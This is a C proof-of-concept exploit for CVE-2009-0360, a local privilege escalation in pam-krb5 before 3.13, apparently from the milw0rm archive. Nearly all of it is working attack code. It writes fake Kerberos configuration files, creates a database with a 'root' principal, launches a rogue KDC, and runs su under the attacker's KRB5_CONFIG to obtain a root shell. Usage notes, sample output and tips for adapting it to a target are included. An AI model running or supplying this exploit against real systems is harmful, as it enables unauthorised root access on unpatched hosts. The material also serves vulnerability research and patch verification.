pam-krb5 < 3.13 Local Privilege Escalation Exploit

                                                /*
 * cve-2009-0360.c
 *
 * pam-krb5 < 3.13 local privilege escalation
 * Jon Oberheide <[email protected]>
 * http://jon.oberheide.org
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0360
 *
 *   pam-krb5 before 3.13, when linked against MIT Kerberos, does not properly 
 *   initialize the Kerberos libraries for setuid use, which allows local 
 *   users to gain privileges by pointing an environment variable to a 
 *   modified Kerberos configuration file, and then launching a PAM-based 
 *   setuid application. 
 *   
 * Usage:
 *
 *   $ gcc cve-2009-0360.c -o cve-2009-0360
 *   $ ./cve-2009-0360
 *   [+] creating krb5.conf
 *   [+] creating kdc.conf
 *   [+] creating kerberos database
 *   Loading random data
 *   Initializing database '/tmp/cve-2009-0360/principal' for realm 'TEST.COM',
 *   master key name 'K/[email protected]'
 *   [+] adding principal [email protected]
 *   Authenticating as principal [email protected] with password.
 *   Enter KDC database master key: 
 *   WARNING: no policy specified for [email protected]; defaulting to no policy
 *   Principal "[email protected]" created.
 *   [+] launching krb5kdc on 141.212.110.163:6666
 *   [+] launching su with fake KDC configuration
 *   [+] enter "root" at the password prompt
 *   Password: 
 *   # id
 *   uid=0(root) gid=0(root) ...
 *
 * Notes:
 *
 *   This exploit will result in local privilege escalation on hosts that use 
 *   the pam-krb5 module for su authentication.  Check the su and system-auth
 *   PAM configuration files in /etc/pam.d to determine if pam-krb5 is in use.
 *   Some customization of the defined constants and paths may be necessary 
 *   for your environment.  Be sure to set FAKE_KDC_HOST to the IP address of
 *   an active non-loopback interface on the target machine.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>

#define REALM "TEST.COM"
#define FAKE_KDC_HOST "141.212.110.163"
#define FAKE_KDC_PORT "6666"
#define PRINCIPAL_NAME "root"
#define PRINCIPAL_PASS "root"
#define TMP_DIR "/tmp/cve-2009-0360"
#define KUTIL_PATH "/usr/sbin/kdb5_util"
#define KADMIN_PATH "/usr/sbin/kadmin.local"
#define KRB5KDC_PATH "/usr/sbin/krb5kdc"

#define KRB5_CONF \
  "[libdefaults]\n\tdefault_realm = " REALM "\n\n[realms]\n\t" REALM \
  " = {\n\t\tadmin_server = " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n\t\t" \
  "default_domain = " REALM "\n\t\tkdc = " FAKE_KDC_HOST ":" FAKE_KDC_PORT \
  "\n\t}\n\n[domain_realm]\n\t." REALM " = " REALM "\n\t" REALM " = " REALM

#define KDC_CONF \
  "[kdcdefaults]\n\tkdc_ports = " FAKE_KDC_PORT "\n\n[realms]\n\t" REALM \
  " = {\n\t\tdatabase_name = " TMP_DIR "/principal\n\t\tadmin_keytab = " \
  "FILE:" TMP_DIR "/kadm5.keytab\n\t\tacl_file = " TMP_DIR "/kadm5.acl" \
  "\n\t\tkey_stash_file = " TMP_DIR "/stash\n\t\tkdc_ports = " FAKE_KDC_PORT \
  "\n\t\tmax_life = 10h 0m 0s\n\t\tmax_renewable_life = 7d 0h 0m 0s\n\t}"

int
main(void)
{
    int ret;
    FILE *fp;
    char *err;

    ret = mkdir(TMP_DIR, 0755);
    if (ret == -1 && errno != EEXIST) {
        err = "cannot create TMP_DIR";
        printf("[-] Error: %s (%s)\n", err, strerror(errno));
        return 1;
    }

    printf("[+] creating krb5.conf\n");
    sleep(1);

    fp = fopen(TMP_DIR "/krb5.conf", "w");
    if (!fp) {
        err = "cannot open krb5.conf";
        printf("[-] Error: %s (%s)\n", err, strerror(errno));
        return 1;
    }
    fwrite(KRB5_CONF, 1, strlen(KRB5_CONF), fp);
    fclose(fp);

    printf("[+] creating kdc.conf\n");
    sleep(1);

    fp = fopen(TMP_DIR "/kdc.conf", "w");
    if (!fp) {
        err = "cannot open kdc.conf";
        printf("[-] Error: %s (%s)\n", err, strerror(errno));
        return 1;
    }
    fwrite(KDC_CONF, 1, strlen(KDC_CONF), fp);
    fclose(fp);

    chdir(TMP_DIR);

    printf("[+] creating kerberos database\n");
    sleep(1);

    ret = system(KUTIL_PATH " create -d " TMP_DIR "/principal -sf " TMP_DIR \
                 "/stash -r " REALM " -s -P \"\"");
    if (WEXITSTATUS(ret) != 0) {
        err = "kdb5_util command returned non-zero";
        printf("[-] Error: %s, continuing exploit anyway\n", err);
    }

    printf("[+] adding principal " PRINCIPAL_NAME "@" REALM "\n");
    sleep(1);

    ret = system("echo \"\" | " KADMIN_PATH " -m -p " PRINCIPAL_NAME "@" REALM \
                 " -d " TMP_DIR "/principal -r " REALM " -q \"add_principal " \
                 "-pw " PRINCIPAL_PASS " " PRINCIPAL_NAME "@" REALM "\"");
    if (WEXITSTATUS(ret) != 0) {
        err = "kadmin.local command returned non-zero";
        printf("[-] Error: %s, continuing exploit anyway\n", err);
    }

    printf("[+] launching krb5kdc on " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n");
    sleep(1);

    ret = system("KRB5_KDC_PROFILE=\"" TMP_DIR "/kdc.conf\" " KRB5KDC_PATH \
                 " -d " TMP_DIR "/principal -r " REALM);
    if (WEXITSTATUS(ret) != 0) {
        err = "krb5kdc command returned non-zero";
        printf("[-] Error: %s, continuing exploit anyway\n", err);
    }

    printf("[+] launching su with fake KDC configuration\n");
    sleep(1);
    printf("[+] enter \"" PRINCIPAL_PASS "\" at the password prompt\n");
    sleep(1);

    system("KRB5_CONFIG=\"" TMP_DIR "/krb5.conf\" su");

    return 0;
}

// milw0rm.com [2009-03-29]